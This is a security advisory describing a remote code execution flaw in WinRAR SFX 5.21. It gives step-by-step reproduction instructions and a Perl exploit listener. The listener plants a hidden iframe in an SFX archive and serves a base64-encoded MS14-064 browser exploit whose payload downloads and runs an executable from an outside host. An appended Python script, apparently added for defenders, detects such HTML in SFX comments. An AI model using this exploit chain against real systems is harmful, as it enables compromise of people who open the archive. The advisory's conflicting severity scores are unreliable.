Document Title:
===============
WinRAR SFX v5.21 - Remote Code Execution Vulnerability
References (Source):
====================
http://www.vulnerability-lab.
Video: https://www.youtube.com/watch?
Release Date:
=============
2015-09-28
Vulnerability Laboratory ID (VL-ID):
==============================
1608
Common Vulnerability Scoring System:
==============================
9
Product & Service Introduction:
==============================
WinRAR, with over 500 million users worldwide, is by far the most popular compression program and therefore the best way to pack files securely and
efficiently for a data transfer, to speed up transfers via e-mail, and to store optimized files securely.
(Copy of the Homepage: http://www.win-rar.com/start.
Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a code execution vulnerability in the official WinRAR SFX v5.21 software.
Vulnerability Disclosure Timeline:
==============================
2015-09-28: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Critical
Technical Details & Description:
==============================
A remote code execution vulnerability has been discovered in the official WinRAR SFX v5.21 software.
The vulnerability allows remote attackers to execute system-specific code without authorization and compromise a target system.
The issue is located in the `Text and Icon` function of the `Text to display in SFX window` module. Remote attackers are
able to generate their own compressed SFX archives with malicious payloads and execute system-specific code on the target. The attacker
saves the malicious HTML code in the SFX archive's text field; the SFX window renders that HTML when the archive is opened, which results in
system-specific code execution when a target user or system opens the compressed archive.
In the PoC below, the HTML placed in the SFX window only makes the SFX window's renderer load a page from an attacker-controlled listener.
The code that actually runs on the target is the base64-encoded MS14-064 (Internet Explorer VBScript, CVE-2014-6332) exploit page that the
listener serves, so a target with the MS14-064 update installed loads the page but is not compromised by this particular payload.
The security risk of the code execution vulnerability is estimated as critical with a CVSS (Common Vulnerability Scoring System) count of 9.2.
Exploitation of the code execution vulnerability requires low user interaction (opening the file) and no privileged system or restricted user account.
Successful exploitation of the remote code execution vulnerability in the WinRAR SFX software results in system, network or device compromise.
Proof of Concept (PoC):
=======================
The code execution vulnerability can be exploited by remote attackers without a privileged system user account; low user interaction (the target opens the SFX file) is required.
For a security demonstration, or to reproduce the vulnerability, follow the information and steps provided below.
Manual steps to reproduce the vulnerability ...
1. Run the Perl code: perl poc.pl (it prints the HTML to paste and then listens on port 80)
2. Right-click any file and select "Add to archive..."
3. Select "Create SFX archive"
4. Go to the Advanced tab and select "SFX options..."
5. Go to the "Text and icon" menu
6. Copy the Perl output (HTML) and paste it into "Text to display in SFX window"
7. Click OK -- OK
8. Your SFX file is created
9. Open the SFX file on the target
10. The SFX window loads your link from the listener, and the served page downloads and executes the payload on the target
11. Successful reproduction of the code execution vulnerability!
PoC: Exploit Code
#!/usr/bin/perl
# Title : WinRAR SFX - Remote Code Execution
# Affected Versions: All Version
# Tested on Windows 7 / Server 2008
#
# Author: Mohammad Reza Espargham
# Linkedin: https://ir.linkedin.com/in/
# E-Mail: me[at]reza[dot]es , reza.espargham[at]gmail[dot]
# Website: www.reza.es
# Twitter: https://twitter.com/rezesp
# FaceBook: https://www.facebook.com/reza.
#
# ID: MS14-064 (the base64-encoded page served below is the MS14-064 Internet
# Explorer VBScript exploit; it is what actually executes code on the target)
use strict;
use warnings;
use IO::Socket;
use MIME::Base64 qw( decode_base64 );
use Socket 'inet_ntoa';
use Sys::Hostname 'hostname';

print " Mohammad Reza Espargham\n\n";

# Address and port that the HTML in the SFX window will connect back to.
my $ip   = inet_ntoa(scalar gethostbyname(hostname() || 'localhost'));
my $port = 80;

# HTML to paste into "Text to display in SFX window". This print statement is
# truncated in the published copy; the hidden iframe pointing at the listener
# is reconstructed from $ip/$port above and is an assumption, not the original.
print "Winrar HTML Code\n"
    . '<html><head><title></title></head><body>'
    . '<iframe src="http://' . $ip . ':' . $port . '/" width="0" height="0"></iframe>'
    . '</body></html>' . "\n\n";

# Listener: every request, whatever its path, receives the exploit page.
my $server = IO::Socket::INET->new( Proto     => 'tcp',
                                    LocalPort => $port,
                                    Listen    => SOMAXCONN,
                                    ReuseAddr => 1 )
    or die "Unable to create server socket: $!";

# Server loop
while ( my $client = $server->accept() ) {
    my $client_info = '';
    while (<$client>) {
        last if /^\r\n$/;          # blank line ends the HTTP request headers
        $client_info .= $_;
    }
    incoming( $client, $client_info );
}

sub incoming {
    my ( $client, $client_info ) = @_;
    print "\n=== Incoming Request:\n$client_info";
    print $client buildResponse( $client, $client_info );
    close($client);
}

sub buildResponse {
    my ( $client, $client_info ) = @_;
    # Base64 of the exploit HTML page (MS14-064); each line is cut short in this copy.
    my $poc = "
dWxhdGVJRTgiID4KPGhlYWQ+
Y3JpcHQiPgoKZnVuY3Rpb24gcnVubX
ZWxsPWNyZWF0ZW9iamVjdCgiU2hlbG
cmVzc2lvbiAkKE5ldy1PYmplY3QgU3
aHR0cDovL3RoZS5lYXJ0aC5saS9+
LCdsb2FkLmV4ZScpOyQoTmV3LU9iam
ZWN1dGUoJ2xvYWQuZXhlJyk7IgpzaG
Ii1Db21tYW5kICIgJiBjb21tYW5kLC
cHQ+
KCkKZGltICAgYTAKZGltICAgYTEKZG
aW50VmVyc2lvbgpkaW0gICBybmRhCm
bigpCiAKZnVuY3Rpb24gQmVnaW4oKQ
Z2F0b3IuVXNlckFnZW50CiAKICBpZi
IGV4aXQgICBmdW5jdGlvbgogIGVuZC
IHRoZW4gCiAgICAgICAgICAgICBpbn
bywgIk1TSUUiKSArIDUsIDIpKSAgIA
ICAgICAgICAgIAogIGVuZCBpZgogCi
dGUoKT1UcnVlIFRoZW4KICAgICBteW
aHJ3KDAxKSZjaHJ3KDAwKSZjaHJ3KD
IG15YXJyYXk9bXlhcnJheSZjaHJ3KD
ICAgICBpZihpbnRWZXJzaW9uPDQpIH
SUUiKQogICAgICAgICBkb2N1bWVudC
bGNvZGUoKSAgICAgICAgICAgICAgIC
YWZlbW9kZSgpCiAgICAgZW5kIGlmCi
Z2luSW5pdCgpCiAgIFJhbmRvbWl6ZS
IGEwPTEzKzE3KnJuZCg2KQogICBhMz
IENyZWF0ZSgpCiAgT24gRXJyb3IgUm
IEZvciBpID0gMCBUbyA0MDAKICAgIE
cnVlCiAgICAgICBFeGl0IEZvcgogIC
IHRlc3RhYSgpCmVuZCBzdWIKIApmdW
IE5leHQKICAgICBpPXRlc3RhYQogIC
MikgIAogICAKICAgICBhYigwKT0wCi
NDM3ODAxRS0zMTQKIAogICAgIGFhKG
NzMxMzI0RS0zMTAgIAogICAgIG15ZG
YTApICAKZW5kIGZ1bmN0aW9uIAogCi
RXJyb3IgUmVzdW1lIE5leHQKICAgIG
dW0oaSsxNikKICAgIGo9cnVtKGkrJm
ICAgICAgICBqPXJ1bShpKyZoMTIwK2
ICAgIGo9MCAgICAgICAgICAKICAgIC
ICAgICAgICAgIAogICAgIGFhKGExKz
ZWRpbSAgUHJlc2VydmUgYWEoYTApIC
KyZoMTIwK2spICAgCiAgICAgICAgIC
ICBlbmQgaWYKIAogICAgbmV4dCAKIC
cnVubXVtYWEoKSAKZW5kIGZ1bmN0aW
ZXN1bWUgTmV4dAogICAgZGltIHR5cG
MD1hMCthMwogICAgYTE9YTArMgogIC
ZXNlcnZlIGFhKGEwKSAKICAgIHJlZG
c2VydmUgYWEoYTIpCiAgIAogICAgdH
Nzg5MDEyMzQ1Njc4OTAKICAgIGFhKG
YWEoYTEtMSkpID0gRmFsc2UpIFRoZW
ICAgICAgIG1lbT1jaW50KGEwKzEpKj
ZShhYShhMS0xKSkKICAgICAgICAgIC
ICAgICAgICAgICAgICBpZih2YXJ0eX
ICAgICAgICAgSWYoSXNPYmplY3QoYW
ICAgICAgICAgICAgICAgICAgIHR5cG
IGVuZCBpZiAgICAgICAgICAgICAgIA
c2UKICAgICAgICAgICAgIHJlZGltIC
IGZ1bmN0aW9uCiAKICAgICAgICAgIC
KHZhcnR5cGUoYWEoYTEtMSkpPD4wKS
dChhYShhMSkpID0gRmFsc2UgKSBUaG
YWEoYTEpKQogICAgICAgICAgICAgIG
bmQgaWYKICAgICAgICBlbmQgaWYKIC
IElmKHR5cGUxPSZoMmY2NikgVGhlbi
CiAgICBFbmQgSWYgIAogICAgSWYodH
dWUKICAgICAgICAgIHdpbjl4PTEKIC
YShhMCkgICAgICAgICAgCiAgICAgIC
KSAKICAgIE9uIEVycm9yIFJlc3VtZS
ICAgCiAgICBhYigwKT0wICAgCiAgIC
OTY2MzMxNjc0N0UtMzEzICAgICAgIA
KDApPTAKICAgIHJlZGltICBQcmVzZX
CiAKPC9ib2R5Pgo8L2h0bWw+";
    # NOTE: the base64 lines above are truncated in this copy of the advisory, so
    # decode_base64() will not reproduce the original page without re-encoding it.
    $poc = decode_base64($poc);
    my $r = "HTTP/1.0 200 OK\r\n"
          . "Content-type: text/html\r\n\r\n"
          . $poc;
    return $r;
}
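Defender's side, as an added example that is not part of the advisory or the author's PoC: a small Python triage script that walks a RAR SFX executable's archive headers, pulls the SFX script out of the archive comment and reports whether the "Text" block hands HTML (and which URLs) to the SFX window's renderer, which is exactly the condition the steps above rely on. It assumes the RAR 4.x block layout from the RAR technote, that WinRAR stores SFX commands in the archive comment as a service header (type 0x7A) named CMT, and that the comment is stored uncompressed; when the comment is compressed (method other than 0x30) the script only flags it for extraction with unrar. The sample SFX bytes, the DOS stub and the listener address 192.0.2.10 are constructed for the example.

```python
"""Triage a RAR SFX executable for HTML in its SFX 'Text' block.
Added example (not the advisory's or WinRAR's code). Assumptions: RAR 4.x block
layout per the RAR technote; SFX commands live in the archive comment, stored as
a service header (0x7A) named "CMT"; the sample bytes below are constructed."""
import re
import struct
import zlib

RAR4_SIG = b"Rar!\x1a\x07\x00"  # marker block that starts a RAR 4.x archive
HEAD_MAIN, HEAD_SERVICE, HEAD_END = 0x73, 0x7A, 0x7B
LONG_BLOCK = 0x8000               # header is followed by ADD_SIZE bytes of data
HIGH_SIZES = 0x0100               # file/service header carries 64-bit sizes
METHOD_STORED = 0x30              # data after the header is not compressed

HTML_RE = re.compile(rb"<\s*(html|iframe|script|meta|object|embed)\b", re.I)
URL_RE = re.compile(rb"https?://[^\s\"'<>]+", re.I)
TEXT_RE = re.compile(rb"^Text[ \t]*\r?\n\{[ \t]*\r?\n(.*?)\r?\n\}", re.S | re.M)


def iter_blocks(data, start):
    """Walk the RAR 4.x blocks after the marker: (type, flags, header, payload)."""
    pos = start + len(RAR4_SIG)
    while pos + 7 <= len(data):
        _crc, head_type, flags, head_size = struct.unpack_from("<HBHH", data, pos)
        if head_size < 7:
            break
        add_size = 0
        if flags & LONG_BLOCK:
            if pos + 11 > len(data):
                break
            add_size = struct.unpack_from("<I", data, pos + 7)[0]
        header = data[pos:pos + head_size]
        payload = data[pos + head_size:pos + head_size + add_size]
        yield head_type, flags, header, payload
        if head_type == HEAD_END:
            break
        pos += head_size + add_size


def extract_comment(data):
    """Return (stored, method, comment_bytes_or_None) for the CMT block, or None."""
    off = data.find(RAR4_SIG)
    if off < 0:
        return None
    for head_type, flags, header, payload in iter_blocks(data, off):
        if head_type != HEAD_SERVICE or len(header) < 32:
            continue
        method = header[25]                       # compression method byte
        name_size = struct.unpack_from("<H", header, 26)[0]
        name_off = 32 + (8 if flags & HIGH_SIZES else 0)
        if header[name_off:name_off + name_size] != b"CMT":
            continue
        stored = method == METHOD_STORED
        return stored, method, (payload if stored else None)
    return None


def sfx_text_findings(data):
    """Report what the SFX 'Text' block would hand to the SFX window's HTML renderer."""
    result = {"rar_sfx": data.find(RAR4_SIG) >= 0, "stored": None,
              "html": None, "urls": [], "text": None}
    cmt = extract_comment(data)
    if cmt is None:
        return result
    stored, method, comment = cmt
    result["stored"] = stored
    if not stored:
        result["method"] = method  # compressed comment: extract with unrar, then review
        return result
    m = TEXT_RE.search(comment)
    result["text"] = m.group(1) if m else b""
    result["html"] = HTML_RE.search(result["text"]) is not None
    result["urls"] = URL_RE.findall(result["text"])
    return result


def _block(head_type, flags, body, payload=b""):
    """Assemble one RAR 4.x block; HEAD_CRC is CRC32 & 0xFFFF over type..end of header."""
    if payload:
        flags |= LONG_BLOCK
        body = struct.pack("<I", len(payload)) + body  # ADD_SIZE (PACK_SIZE)
    tail = struct.pack("<BHH", head_type, flags, 7 + len(body)) + body
    return struct.pack("<H", zlib.crc32(tail) & 0xFFFF) + tail + payload


def build_sample_sfx(script, method=METHOD_STORED):
    """Constructed stand-in for an SFX .exe: DOS stub, marker, main, CMT, end."""
    stub = b"MZ" + b"\x00" * 62 + b"This program cannot be run in DOS mode.\r\n"
    cmt_body = struct.pack("<IBIIBBHI", len(script), 2, zlib.crc32(script),
                           0, 29, method, 3, 0) + b"CMT"
    return (stub + RAR4_SIG + _block(HEAD_MAIN, 0, b"\x00" * 6)
            + _block(HEAD_SERVICE, 0, cmt_body, script) + _block(HEAD_END, 0x4000, b""))


# SFX script shaped like the advisory's PoC: a hidden iframe in the 'Text' block
# that pulls a page from an attacker listener (address constructed for the example).
SFX_SCRIPT = (b"Title=Setup\r\nText\r\n{\r\n"
              b'<html><body><iframe src="http://192.0.2.10:80/" width=0 height=0>'
              b"</iframe></body></html>\r\n}\r\n")

if __name__ == "__main__":
    print(sfx_text_findings(build_sample_sfx(SFX_SCRIPT)))
```

On a real file, pass `open(path, "rb").read()` to `sfx_text_findings`; a result with `"html": True` or a non-empty `"urls"` list means the SFX window will render attacker-supplied markup and may fetch remote content when the archive is opened, while `"stored": False` means the comment is compressed and has to be pulled out with unrar before the same check can be applied.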
Security Risk:
==============
The security risk of the code execution vulnerability in the WinRAR SFX software is estimated as high. (CVSS 7.4)
Credits & Authors:
==================
Mohammad Reza Espargham [https://ir.linkedin.com/in/
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/
Feeds: vulnerability-lab.com/rss/rss.
Programs: vulnerability-lab.com/submit.
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™